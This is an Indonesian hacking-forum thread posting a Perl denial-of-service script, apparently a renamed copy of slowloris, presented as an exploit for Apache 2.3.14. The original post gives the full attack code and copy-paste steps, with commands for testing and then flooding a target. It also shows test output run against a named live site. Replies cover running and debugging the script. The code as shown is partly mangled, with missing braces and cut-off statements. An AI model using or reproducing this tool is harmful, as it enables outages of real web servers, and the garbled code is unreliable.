DDoS Apache Server 2.3.14
Hacker dan penulis eksploit dari Mesir bernama Xenon menemukan sebuah vulnerability pada Apache Server versi 2.3.14 terbaru saat ini (pada saat ditulis adalah tanggal 25 Oktober 2011)

Program DDoS ini ditulis dalam bahasa Perl, silahkan copas codes dibawah ini:

#!/usr/bin/perl -w
# Exploit Title: Apache Server  2.3.14 <= Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us [email protected]
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
          ooooooo  ooooo                         .oooo.              
           `8888    d8'                         d8P'`Y8b              
             Y888..8P     .ooooo.  ooo. .oo.   888    888 ooo. .oo.  
              `8888'     d88' `88b `888P"Y88b  888    888 `888P"Y88b  
             .8PY888.    888ooo888  888   888  888    888  888   888  
            d8'  `888b   888    .o  888   888  `88b  d88'  888   888  
          o888o  o88888o `Y8bod8P' o888o o888o  `Y8bd8P'  o888o o888o
Welcome to Xen0n Apache Attacker


my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions('shost=s'   => \$shost,'dns=s'     => \$host,'xenon' => \$xenon,'num=i'     => \$connections,'cache'     => \$cache,'port=i'    => \$port,'https'     => \$ssl,'tcpto=i'   => \$tcpto,'test'      => \$test,'timeout=i' => \$timeout,'version'   => \$version,);

if ($version) {
    print "Version 1.0\n";

unless ($host) {
    print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";

    print "\n\temail: xenon.sec@ gmail.com\n";
print "\n";

unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";

unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";

unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
else {
    print "No multithreading capabilites found!\n";
    print "Xen0n will be slower than normal as a result.\n";

my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
    $sendhost = $shost;
else {
    $sendhost = $host;
if ($xenon) {
    $method = "POST";
else {
    $method = "GET";

if ($test) {
    my @times = ( "1", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    $totaltime = $totaltime / 60;
    print "Testing $host could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            $working = 1;
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            $working = 1;
    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        else {
            $rand = "";
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now just wait...\n";
        else {
"That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
            print "\tFailed after $times[$i] seconds.\n";

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Xen0n closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all...  you might have trouble using Xen0n against this target.  You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
else {
"Attacking $host:$port every $timeout seconds with $connections sockets:\n";

    if ($usemultithreading) {
    else {
        doconnections( $connections, $usemultithreading );

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        $working[$z] = 1;
                    else {
                        $working[$z] = 0;
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
                    else {
                        $working[$z] = 0;
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    else {
                        $rand = "";
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                        else {
                            $working[$z] = 1;
                    else {
                        $working[$z] = 0;
                else {
                    $working[$z] = 0;
        print "\t\tSending data.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                    else {
                        $working[$z] = 0;
                        #debugging info
                else {
                    $working[$z] = 0;
                    #debugging info
"Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] =
          threads->create( \&doconnections, $connectionsperthread, 1 );
        $i += $connectionsperthread;
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;


# 1337day.com [2011-10-22]

save dengan filename.pl, mari kita coba dengan cara:
perl filename.pl

kemudian akan muncul:
perl tes.pl -dns [www.example.com] -test
perl tes.pl -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon

jadi cara pakenya pertama harus dilakukan tes dulu apakah website tersebut vulnerable ato tidak:
perl filename.pl -dns http://target.com -test

nanti akan muncul seperti berikut:
Quote:root@bt:~# perl tes.pl -dns http://target.com -test
ooooooo ooooo .oooo.
`8888 d8' d8P'`Y8b
Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
`8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
.8PY888. 888ooo888 888 888 888 888 888 888
d8' `888b 888 .o 888 888 `88b d88' 888 888
o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o

Welcome to Xen0n Apache Attacker

Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Testing indonesianbacktrack.or.id could take up to 14.35 minutes.
Connection successful, now just wait...
Trying a 1 second delay:
Trying a 30 second delay:
Trying a 90 second delay:
Trying a 240 second delay:
Trying a 500 second delay:
Okay that's enough time. Xen0n closed the socket.
Use 500 seconds for -timeout.

kalo vulnerable maka bisa kita lakukan DDoS ke target tersebut, dan karena pada -test diatas disarankan menggunakan "500 seconds for -timeout" maka:
perl filename.pl -dns http://target.com -port 80 -timeout 500 -num 1000 -tcpto 5 -xenon

- klo dilihat dari cara kerjanya sih mirip slowloris cmiiw
- skrip ini dapat juga digunakan pada Apache server dibawah versi 2.3.14
- harap jangan disalahgunakan

semoga bermanfaat


hampir mirip apachekiller ya oms?

(10-25-2011, 03:04 PM)snail_venom Wrote: hampir mirip apachekiller ya oms?
iya mirip2, klo ga salah yg buat jg sama cmiiw

(10-25-2011, 03:04 PM)Liyan Oz Wrote: yang terbaru ya,, kemaren baca2 di THN Tongue
iya nih Big Grin

klu cara running, dilihat dri mna yaaa???

Bang mau nanya , ini error kenapa yah ?

Quote:root@bt:~/Indonesian Backtrack Team/DDoS Apache Server 2.3.14# perl ddosapache.pl
String found where operator expected at ddosapache.pl line 167, near "$ #times ; $i++ ) {
print "Trying a $times[$i] second delay: \n""
(Missing operator before "Trying a $times[$i] second delay: \n"?)
Global symbol "$print" requires explicit package name at ddosapache.pl line 167.
syntax error at ddosapache.pl line 167, near "$ #times ; $i++ ) {
print "Trying a $times[$i] second delay: \n""
syntax error at ddosapache.pl line 169, near "if"
syntax error at ddosapache.pl line 173, near "else"
Global symbol "$delay" requires explicit package name at ddosapache.pl line 175.
Global symbol "@times" requires explicit package name at ddosapache.pl line 175.
Global symbol "$i" requires explicit package name at ddosapache.pl line 175.
syntax error at ddosapache.pl line 177, near "}"
Global symbol "$sock" requires explicit package name at ddosapache.pl line 182.
Global symbol "$delay" requires explicit package name at ddosapache.pl line 184.
syntax error at ddosapache.pl line 186, near "}"
ddosapache.pl has too many errors.
root@bt:~/Indonesian Backtrack Team/DDoS Apache Server 2.3.14# nano ddosapache.pl
Quote:Call me Dillah , Okey ?

mantap om ...
coba ah... mudah2an tut om dimamfaatkan ama2 teman2 dengain baik dan benar

sourcenya slowloris mas bro

bash-4.2$ diff -c slowloris.pl xenon.pl > result
bash-4.2$ grep "+ " result
+ # Exploit Title: Apache Server 2.3.14 <= Denial of Service exploit (DDOS)
+ # Date: 22/10/2011
+ # Author: Xen0n
+ # Software Link: http://www.apache.org/dyn/closer.cgi
+ # Version: 2.3.14 and older
+ # Tested on: CentOs
+ #feel

bash-4.2$ grep "! " result
! print "Slowloris will be slower than normal as a result.\n";
! print "Xen0n will be slower than normal as a result.\n";
! if ($httpready) {
! if ($xenon) {

hanya pengubahan variabel dan string saja

logika dan sourcenya nya sama dg slowloris beda author aja,

original : http://ha.ckers.org/slowloris/slowloris.pl

nice share om...... akan di coba

(12-07-2012, 11:05 AM)arafahcom Wrote: Bang mau nanya , ini error kenapa yah ?

Quote:root@bt:~/Indonesian Backtrack Team/DDoS Apache Server 2.3.14# perl ddosapache.pl
String found where operator expected at ddosapache.pl line 167, near "$ #times ; $i++ ) {
print "Trying a $times[$i] second delay: \n""
(Missing operator before "Trying a $times[$i] second delay: \n"?)
Global symbol "$print" requires explicit package name at ddosapache.pl line 167.
syntax error at ddosapache.pl line 167, near "$ #times ; $i++ ) {
print "Trying a $times[$i] second delay: \n""
syntax error at ddosapache.pl line 169, near "if"
syntax error at ddosapache.pl line 173, near "else"
Global symbol "$delay" requires explicit package name at ddosapache.pl line 175.
Global symbol "@times" requires explicit package name at ddosapache.pl line 175.
Global symbol "$i" requires explicit package name at ddosapache.pl line 175.
syntax error at ddosapache.pl line 177, near "}"
Global symbol "$sock" requires explicit package name at ddosapache.pl line 182.
Global symbol "$delay" requires explicit package name at ddosapache.pl line 184.
syntax error at ddosapache.pl line 186, near "}"
ddosapache.pl has too many errors.
root@bt:~/Indonesian Backtrack Team/DDoS Apache Server 2.3.14# nano ddosapache.pl

cek lg om scriptny pada line yang bermasalah
#times itu klo g salah cuma label, pindahin aja penempatanya

Tanya dong pas saya jalanin scriptnya malah tampil kayak begini, Ini kenapa ya
bash: ./ddosapache2314.pl: Permission denied
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

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